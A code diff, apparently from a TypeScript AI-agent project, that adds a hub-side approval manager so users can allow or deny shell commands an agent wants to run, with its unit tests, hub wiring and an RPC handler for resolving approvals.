|
||||
it("returns false when resolving unknown approval", () => {
|
||||
const resolved = manager.resolveApproval("unknown-id", "allow-once");
|
||||
expect(resolved).toBe(false);
|
||||
});
|
||||
|
||||
it("returns false when resolving already-resolved approval", async () => {
|
||||
const promise = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
const request = sendToClient.mock.calls[0]![1];
|
||||
|
||||
// First resolve succeeds
|
||||
expect(manager.resolveApproval(request.approvalId, "allow-once")).toBe(true);
|
||||
// Second resolve fails
|
||||
expect(manager.resolveApproval(request.approvalId, "deny")).toBe(false);
|
||||
|
||||
await promise;
|
||||
});
|
||||
|
||||
it("cancels all pending approvals for an agent", async () => {
|
||||
const promise1 = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd1",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
const promise2 = manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd2",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
const promise3 = manager.requestApproval({
|
||||
agentId: "agent-2",
|
||||
command: "cmd3",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
// Cancel agent-1's approvals
|
||||
manager.cancelPending("agent-1");
|
||||
|
||||
const result1 = await promise1;
|
||||
const result2 = await promise2;
|
||||
|
||||
expect(result1.approved).toBe(false);
|
||||
expect(result1.decision).toBe("deny");
|
||||
expect(result2.approved).toBe(false);
|
||||
expect(result2.decision).toBe("deny");
|
||||
|
||||
// agent-2's approval should still be pending
|
||||
expect(manager.pendingCount).toBe(1);
|
||||
|
||||
// Resolve agent-2's approval
|
||||
const request3 = sendToClient.mock.calls[2]![1];
|
||||
manager.resolveApproval(request3.approvalId, "allow-once");
|
||||
const result3 = await promise3;
|
||||
expect(result3.approved).toBe(true);
|
||||
});
|
||||
|
||||
it("auto-denies when sendToClient throws", async () => {
|
||||
const failingSender = vi.fn().mockImplementation(() => {
|
||||
throw new Error("Connection lost");
|
||||
});
|
||||
const failManager = new ExecApprovalManager(failingSender, 5000);
|
||||
|
||||
const result = await failManager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
expect(result.approved).toBe(false);
|
||||
expect(result.decision).toBe("deny");
|
||||
});
|
||||
|
||||
it("getSnapshot returns request details", () => {
|
||||
manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "ls",
|
||||
riskLevel: "safe",
|
||||
riskReasons: [],
|
||||
});
|
||||
|
||||
const request = sendToClient.mock.calls[0]![1];
|
||||
const snapshot = manager.getSnapshot(request.approvalId);
|
||||
|
||||
expect(snapshot).toBeTruthy();
|
||||
expect(snapshot!.command).toBe("ls");
|
||||
expect(snapshot!.agentId).toBe("agent-1");
|
||||
});
|
||||
|
||||
it("getSnapshot returns null for unknown id", () => {
|
||||
expect(manager.getSnapshot("unknown")).toBeNull();
|
||||
});
|
||||
|
||||
it("tracks pendingCount correctly", () => {
|
||||
expect(manager.pendingCount).toBe(0);
|
||||
|
||||
manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd1",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
expect(manager.pendingCount).toBe(1);
|
||||
|
||||
manager.requestApproval({
|
||||
agentId: "agent-1",
|
||||
command: "cmd2",
|
||||
riskLevel: "needs-review",
|
||||
riskReasons: [],
|
||||
});
|
||||
expect(manager.pendingCount).toBe(2);
|
||||
|
||||
const request = sendToClient.mock.calls[0]![1];
|
||||
manager.resolveApproval(request.approvalId, "deny");
|
||||
expect(manager.pendingCount).toBe(1);
|
||||
});
|
||||
});
|
||||
144
src/hub/exec-approval-manager.ts
Normal file
144
src/hub/exec-approval-manager.ts
Normal file
|
|
@ -0,0 +1,144 @@
|
|||
/**
|
||||
* Exec Approval Manager — Hub-side approval tracking
|
||||
*
|
||||
* Manages pending approval requests, sends them to connected clients,
|
||||
* and resolves them when clients respond via RPC.
|
||||
*/
|
||||
|
||||
import { v7 as uuidv7 } from "uuid";
|
||||
import type {
|
||||
ExecApprovalRequest,
|
||||
ApprovalDecision,
|
||||
ApprovalResult,
|
||||
} from "../agent/tools/exec-approval-types.js";
|
||||
import { DEFAULT_APPROVAL_TIMEOUT_MS } from "../agent/tools/exec-approval-types.js";
|
||||
|
||||
interface PendingEntry {
|
||||
resolve: (result: ApprovalResult) => void;
|
||||
timer: NodeJS.Timeout;
|
||||
request: ExecApprovalRequest;
|
||||
}
|
||||
|
||||
/**
|
||||
* Callback type for sending approval requests to clients.
|
||||
* The Hub wires this to Gateway message sending.
|
||||
*/
|
||||
export type SendApprovalToClient = (
|
||||
agentId: string,
|
||||
payload: ExecApprovalRequest,
|
||||
) => void;
|
||||
|
||||
export class ExecApprovalManager {
|
||||
private readonly pending = new Map<string, PendingEntry>();
|
||||
|
||||
constructor(
|
||||
private readonly sendToClient: SendApprovalToClient,
|
||||
private readonly defaultTimeoutMs: number = DEFAULT_APPROVAL_TIMEOUT_MS,
|
||||
) {}
|
||||
|
||||
/**
|
||||
* Create an approval request and send it to the client.
|
||||
* Returns a Promise that resolves when the client responds or times out.
|
||||
*/
|
||||
requestApproval(params: {
|
||||
agentId: string;
|
||||
command: string;
|
||||
cwd?: string;
|
||||
riskLevel: "safe" | "needs-review" | "dangerous";
|
||||
riskReasons: string[];
|
||||
timeoutMs?: number;
|
||||
askFallback?: "deny" | "allowlist" | "full";
|
||||
allowlistSatisfied?: boolean;
|
||||
}): Promise<ApprovalResult> {
|
||||
const approvalId = uuidv7();
|
||||
const timeoutMs = params.timeoutMs ?? this.defaultTimeoutMs;
|
||||
const expiresAtMs = Date.now() + timeoutMs;
|
||||
|
||||
const request: ExecApprovalRequest = {
|
||||
approvalId,
|
||||
agentId: params.agentId,
|
||||
command: params.command,
|
||||
cwd: params.cwd,
|
||||
riskLevel: params.riskLevel,
|
||||
riskReasons: params.riskReasons,
|
||||
expiresAtMs,
|
||||
};
|
||||
|
||||
return new Promise<ApprovalResult>((resolve) => {
|
||||
// Timeout: follow askFallback (default: fail-closed)
|
||||
const timer = setTimeout(() => {
|
||||
if (this.pending.has(approvalId)) {
|
||||
this.pending.delete(approvalId);
|
||||
const fallback = params.askFallback ?? "deny";
|
||||
const decision =
|
||||
fallback === "full" ||
|
||||
(fallback === "allowlist" && params.allowlistSatisfied)
|
||||
? "allow-once"
|
||||
: "deny";
|
||||
resolve({ approved: decision !== "deny", decision });
|
||||
}
|
||||
}, timeoutMs);
|
||||
|
||||
this.pending.set(approvalId, { resolve, timer, request });
|
||||
|
||||
// Send to client via Gateway
|
||||
try {
|
||||
this.sendToClient(params.agentId, request);
|
||||
} catch (err) {
|
||||
// If sending fails, auto-deny (fail-closed)
|
||||
clearTimeout(timer);
|
||||
this.pending.delete(approvalId);
|
||||
console.error(`[ExecApprovalManager] Failed to send approval request: ${err}`);
|
||||
resolve({ approved: false, decision: "deny" });
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
/**
|
||||
* Resolve a pending approval with a client decision.
|
||||
* Returns true if the approval was found and resolved, false otherwise.
|
||||
*/
|
||||
resolveApproval(approvalId: string, decision: ApprovalDecision): boolean {
|
||||
const entry = this.pending.get(approvalId);
|
||||
if (!entry) return false;
|
||||
|
||||
clearTimeout(entry.timer);
|
||||
this.pending.delete(approvalId);
|
||||
|
||||
entry.resolve({
|
||||
approved: decision !== "deny",
|
||||
decision,
|
||||
});
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
/**
|
||||
* Cancel all pending approvals for an agent (e.g., on agent close).
|
||||
* All pending requests are resolved as denied.
|
||||
*/
|
||||
cancelPending(agentId: string): void {
|
||||
for (const [id, entry] of this.pending) {
|
||||
if (entry.request.agentId === agentId) {
|
||||
clearTimeout(entry.timer);
|
||||
this.pending.delete(id);
|
||||
entry.resolve({ approved: false, decision: "deny" });
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Get a snapshot of a pending approval request (for debugging).
|
||||
*/
|
||||
getSnapshot(approvalId: string): ExecApprovalRequest | null {
|
||||
const entry = this.pending.get(approvalId);
|
||||
return entry ? { ...entry.request } : null;
|
||||
}
|
||||
|
||||
/**
|
||||
* Get count of pending approvals (for monitoring).
|
||||
*/
|
||||
get pendingCount(): number {
|
||||
return this.pending.size;
|
||||
}
|
||||
}
|
||||
152
src/hub/hub.ts
152
src/hub/hub.ts
|
|
@ -1,3 +1,4 @@
|
|||
import { v7 as uuidv7 } from "uuid";
|
||||
import {
|
||||
GatewayClient,
|
||||
type ConnectionState,
|
||||
|
|
@ -23,16 +24,25 @@ import { createDeleteAgentHandler } from "./rpc/handlers/delete-agent.js";
|
|||
import { createUpdateGatewayHandler } from "./rpc/handlers/update-gateway.js";
|
||||
import { DeviceStore, type DeviceMeta } from "./device-store.js";
|
||||
import { createVerifyHandler } from "./rpc/handlers/verify.js";
|
||||
import { ExecApprovalManager } from "./exec-approval-manager.js";
|
||||
import { createResolveExecApprovalHandler } from "./rpc/handlers/resolve-exec-approval.js";
|
||||
import { evaluateCommandSafety, requiresApproval } from "../agent/tools/exec-safety.js";
|
||||
import { addAllowlistEntry, recordAllowlistUse, matchAllowlist } from "../agent/tools/exec-allowlist.js";
|
||||
import type { ExecApprovalCallback, ExecApprovalConfig, ApprovalResult, ExecApprovalRequest } from "../agent/tools/exec-approval-types.js";
|
||||
import { readProfileConfig, writeProfileConfig } from "../agent/profile/storage.js";
|
||||
|
||||
export class Hub {
|
||||
private readonly agents = new Map<string, AsyncAgent>();
|
||||
private readonly agentSenders = new Map<string, string>();
|
||||
private readonly agentStreamIds = new Map<string, string>();
|
||||
private readonly agentStreamCounters = new Map<string, number>();
|
||||
private readonly localApprovalHandlers = new Map<string, (payload: ExecApprovalRequest) => void>();
|
||||
private readonly rpc: RpcDispatcher;
|
||||
private readonly approvalManager: ExecApprovalManager;
|
||||
private client: GatewayClient;
|
||||
readonly deviceStore: DeviceStore;
|
||||
private _onConfirmDevice: ((deviceId: string, agentId: string, meta?: DeviceMeta) => Promise<boolean>) | null = null;
|
||||
private _stateChangeListeners: ((state: ConnectionState) => void)[] = [];
|
||||
url: string;
|
||||
readonly path: string;
|
||||
readonly hubId: string;
|
||||
|
|
@ -67,6 +77,23 @@ export class Hub {
|
|||
this.rpc.register("deleteAgent", createDeleteAgentHandler(this));
|
||||
this.rpc.register("updateGateway", createUpdateGatewayHandler(this));
|
||||
|
||||
// Initialize exec approval manager
|
||||
this.approvalManager = new ExecApprovalManager((agentId, payload) => {
|
||||
// Check local IPC handler first (for desktop direct chat)
|
||||
const localHandler = this.localApprovalHandlers.get(agentId);
|
||||
if (localHandler) {
|
||||
localHandler(payload);
|
||||
return;
|
||||
}
|
||||
// Remote: send via Gateway
|
||||
const targetDeviceId = this.agentSenders.get(agentId);
|
||||
if (!targetDeviceId) {
|
||||
throw new Error(`No client device found for agent ${agentId}`);
|
||||
}
|
||||
this.client.send(targetDeviceId, "exec-approval-request", payload);
|
||||
});
|
||||
this.rpc.register("resolveExecApproval", createResolveExecApprovalHandler(this.approvalManager));
|
||||
|
||||
// Register as global singleton for cross-module access (subagent tools, announce flow)
|
||||
setHub(this);
|
||||
|
||||
|
|
@ -101,6 +128,9 @@ export class Hub {
|
|||
|
||||
client.onStateChange((state) => {
|
||||
console.log(`[Hub] Connection state: ${state}`);
|
||||
for (const listener of this._stateChangeListeners) {
|
||||
listener(state);
|
||||
}
|
||||
});
|
||||
|
||||
client.onRegistered((deviceId) => {
|
||||
|
|
@ -175,6 +205,15 @@ export class Hub {
|
|||
this._onConfirmDevice = handler;
|
||||
}
|
||||
|
||||
/** Subscribe to connection state changes. Returns unsubscribe function. */
|
||||
onConnectionStateChange(callback: (state: ConnectionState) => void): () => void {
|
||||
this._stateChangeListeners.push(callback);
|
||||
return () => {
|
||||
const idx = this._stateChangeListeners.indexOf(callback);
|
||||
if (idx >= 0) this._stateChangeListeners.splice(idx, 1);
|
||||
};
|
||||
}
|
||||
|
||||
/** Register a one-time token for device verification (called when QR code is generated) */
|
||||
registerToken(token: string, agentId: string, expiresAt: number): void {
|
||||
this.deviceStore.registerToken(token, agentId, expiresAt);
|
||||
|
|
@ -189,6 +228,21 @@ export class Hub {
|
|||
this.client.connect();
|
||||
}
|
||||
|
||||
/** Register a local IPC handler for exec approval requests (desktop direct chat). */
|
||||
setLocalApprovalHandler(agentId: string, handler: (payload: ExecApprovalRequest) => void): void {
|
||||
this.localApprovalHandlers.set(agentId, handler);
|
||||
}
|
||||
|
||||
/** Remove local approval handler for an agent. */
|
||||
removeLocalApprovalHandler(agentId: string): void {
|
||||
this.localApprovalHandlers.delete(agentId);
|
||||
}
|
||||
|
||||
/** Resolve a pending exec approval (used by local IPC). */
|
||||
resolveExecApproval(approvalId: string, decision: "allow-once" | "allow-always" | "deny"): boolean {
|
||||
return this.approvalManager.resolveApproval(approvalId, decision);
|
||||
}
|
||||
|
||||
/** Create new Agent, or rebuild with existing ID */
|
||||
createAgent(id?: string, options?: { persist?: boolean; profileId?: string }): AsyncAgent {
|
||||
if (id) {
|
||||
|
|
@ -198,7 +252,10 @@ export class Hub {
|
|||
}
|
||||
}
|
||||
|
||||
const agent = new AsyncAgent({ sessionId: id, profileId: options?.profileId ?? "default" });
|
||||
const profileId = options?.profileId ?? "default";
|
||||
const sessionId = id ?? uuidv7();
|
||||
const onExecApprovalNeeded = this.createExecApprovalCallback(sessionId, profileId);
|
||||
const agent = new AsyncAgent({ sessionId, profileId, onExecApprovalNeeded });
|
||||
this.agents.set(agent.sessionId, agent);
|
||||
|
||||
// Persist to agent store (skip during restore to avoid duplicates)
|
||||
|
|
@ -336,6 +393,96 @@ export class Hub {
|
|||
return agent;
|
||||
}
|
||||
|
||||
/**
|
||||
* Create an exec approval callback for an agent.
|
||||
* This wires the safety evaluation + Hub approval manager together.
|
||||
*/
|
||||
private createExecApprovalCallback(sessionId: string, profileId: string): ExecApprovalCallback {
|
||||
return async (command: string, cwd: string | undefined): Promise<ApprovalResult> => {
|
||||
// Load exec approval config from profile
|
||||
let config: ExecApprovalConfig = {};
|
||||
try {
|
||||
const profileConfig = readProfileConfig(profileId);
|
||||
config = profileConfig?.execApproval ?? {};
|
||||
} catch {
|
||||
// No profile config, use defaults
|
||||
}
|
||||
|
||||
const security = config.security ?? "allowlist";
|
||||
const ask = config.ask ?? "on-miss";
|
||||
|
||||
// Security: deny blocks everything
|
||||
if (security === "deny") {
|
||||
return { approved: false, decision: "deny" };
|
||||
}
|
||||
|
||||
// Security: full allows everything
|
||||
if (security === "full") {
|
||||
return { approved: true, decision: "allow-once" };
|
||||
}
|
||||
|
||||
// Evaluate safety
|
||||
const evaluation = evaluateCommandSafety(command, config);
|
||||
|
||||
// Check if approval is needed
|
||||
const needsApproval = requiresApproval({
|
||||
ask,
|
||||
security,
|
||||
analysisOk: evaluation.analysisOk,
|
||||
allowlistSatisfied: evaluation.allowlistSatisfied,
|
||||
});
|
||||
|
||||
if (!needsApproval) {
|
||||
// Record allowlist usage
|
||||
if (evaluation.allowlistSatisfied) {
|
||||
const match = matchAllowlist(config.allowlist ?? [], command);
|
||||
if (match) {
|
||||
try {
|
||||
const profileConfig = readProfileConfig(profileId) ?? {};
|
||||
const updated = recordAllowlistUse(profileConfig.execApproval?.allowlist ?? [], match, command);
|
||||
writeProfileConfig(profileId, { ...profileConfig, execApproval: { ...config, allowlist: updated } });
|
||||
} catch {
|
||||
// Non-critical: don't fail command for usage recording
|
||||
}
|
||||
}
|
||||
}
|
||||
return { approved: true, decision: "allow-once" };
|
||||
}
|
||||
|
||||
// Request approval via Hub → Gateway → Client
|
||||
const result = await this.approvalManager.requestApproval({
|
||||
agentId: sessionId,
|
||||
command,
|
||||
cwd,
|
||||
riskLevel: evaluation.riskLevel,
|
||||
riskReasons: evaluation.reasons,
|
||||
timeoutMs: config.timeoutMs,
|
||||
askFallback: config.askFallback,
|
||||
allowlistSatisfied: evaluation.allowlistSatisfied,
|
||||
});
|
||||
|
||||
// Handle allow-always: persist to profile allowlist
|
||||
if (result.decision === "allow-always") {
|
||||
try {
|
||||
const profileConfig = readProfileConfig(profileId) ?? {};
|
||||
const currentAllowlist = profileConfig.execApproval?.allowlist ?? [];
|
||||
// Extract binary pattern for allowlist
|
||||
const binary = command.trim().split(/\s+/)[0];
|
||||
const pattern = binary ? `${binary} **` : command;
|
||||
const updated = addAllowlistEntry(currentAllowlist, pattern);
|
||||
writeProfileConfig(profileId, {
|
||||
...profileConfig,
|
||||
execApproval: { ...config, allowlist: updated },
|
||||
});
|
||||
} catch {
|
||||
// Non-critical: command still allowed even if persistence fails
|
||||
}
|
||||
}
|
||||
|
||||
return result;
|
||||
};
|
||||
}
|
||||
|
||||
getAgent(id: string): AsyncAgent | undefined {
|
||||
return this.agents.get(id);
|
||||
}
|
||||
|
|
@ -350,10 +497,12 @@ export class Hub {
|
|||
const agent = this.agents.get(id);
|
||||
if (!agent) return false;
|
||||
agent.close();
|
||||
this.approvalManager.cancelPending(id);
|
||||
this.agents.delete(id);
|
||||
this.agentSenders.delete(id);
|
||||
this.agentStreamIds.delete(id);
|
||||
this.agentStreamCounters.delete(id);
|
||||
this.localApprovalHandlers.delete(id);
|
||||
removeAgentRecord(id);
|
||||
return true;
|
||||
}
|
||||
|
|
@ -368,6 +517,7 @@ export class Hub {
|
|||
this.agentSenders.delete(id);
|
||||
this.agentStreamIds.delete(id);
|
||||
this.agentStreamCounters.delete(id);
|
||||
this.localApprovalHandlers.delete(id);
|
||||
}
|
||||
this.client.disconnect();
|
||||
console.log("Hub shut down");
|
||||
|
|
|
|||
|
|
@ -3,6 +3,9 @@ import { SessionManager } from "../../../agent/session/session-manager.js";
|
|||
import { resolveSessionPath } from "../../../agent/session/storage.js";
|
||||
import { RpcError, type RpcHandler } from "../dispatcher.js";
|
||||
|
||||
// Must match DEFAULT_MESSAGES_LIMIT from @multica/sdk/actions/rpc
|
||||
const DEFAULT_LIMIT = 200;
|
||||
|
||||
interface GetAgentMessagesParams {
|
||||
agentId: string;
|
||||
offset?: number;
|
||||
|
|
@ -14,7 +17,8 @@ export function createGetAgentMessagesHandler(): RpcHandler {
|
|||
if (!params || typeof params !== "object") {
|
||||
throw new RpcError("INVALID_PARAMS", "params must be an object");
|
||||
}
|
||||
const { agentId, offset = 0, limit = 50 } = params as GetAgentMessagesParams;
|
||||
const { agentId, limit = DEFAULT_LIMIT } = params as GetAgentMessagesParams;
|
||||
let { offset } = params as GetAgentMessagesParams;
|
||||
if (!agentId) {
|
||||
throw new RpcError("INVALID_PARAMS", "Missing required param: agentId");
|
||||
}
|
||||
|
|
@ -27,6 +31,12 @@ export function createGetAgentMessagesHandler(): RpcHandler {
|
|||
const session = new SessionManager({ sessionId: agentId });
|
||||
const allMessages = session.loadMessages();
|
||||
const total = allMessages.length;
|
||||
|
||||
// When offset is not provided, return the latest messages
|
||||
if (offset == null) {
|
||||
offset = Math.max(0, total - limit);
|
||||
}
|
||||
|
||||
const sliced = allMessages.slice(offset, offset + limit);
|
||||
|
||||
return { messages: sliced, total, offset, limit };
|
||||
|
|
|
|||
34
src/hub/rpc/handlers/resolve-exec-approval.ts
Normal file
34
src/hub/rpc/handlers/resolve-exec-approval.ts
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
import type { RpcHandler } from "../dispatcher.js";
|
||||
import { RpcError } from "../dispatcher.js";
|
||||
import type { ExecApprovalManager } from "../../exec-approval-manager.js";
|
||||
import type { ApprovalDecision } from "../../../agent/tools/exec-approval-types.js";
|
||||
|
||||
interface ResolveExecApprovalParams {
|
||||
approvalId: string;
|
||||
decision: ApprovalDecision;
|
||||
}
|
||||
|
||||
const VALID_DECISIONS = new Set<ApprovalDecision>(["allow-once", "allow-always", "deny"]);
|
||||
|
||||
export function createResolveExecApprovalHandler(
|
||||
approvalManager: ExecApprovalManager,
|
||||
): RpcHandler {
|
||||
return async (params: unknown) => {
|
||||
const { approvalId, decision } = (params ?? {}) as ResolveExecApprovalParams;
|
||||
|
||||
if (!approvalId || typeof approvalId !== "string") {
|
||||
throw new RpcError("INVALID_PARAMS", "approvalId is required");
|
||||
}
|
||||
|
||||
if (!decision || !VALID_DECISIONS.has(decision)) {
|
||||
throw new RpcError("INVALID_PARAMS", `Invalid decision: ${decision}. Must be allow-once, allow-always, or deny`);
|
||||
}
|
||||
|
||||
const resolved = approvalManager.resolveApproval(approvalId, decision);
|
||||
if (!resolved) {
|
||||
throw new RpcError("NOT_FOUND", "Approval request not found or already resolved");
|
||||
}
|
||||
|
||||
return { ok: true };
|
||||
};
|
||||
}
|
||||
Loading…
Add table
Add a link
Reference in a new issue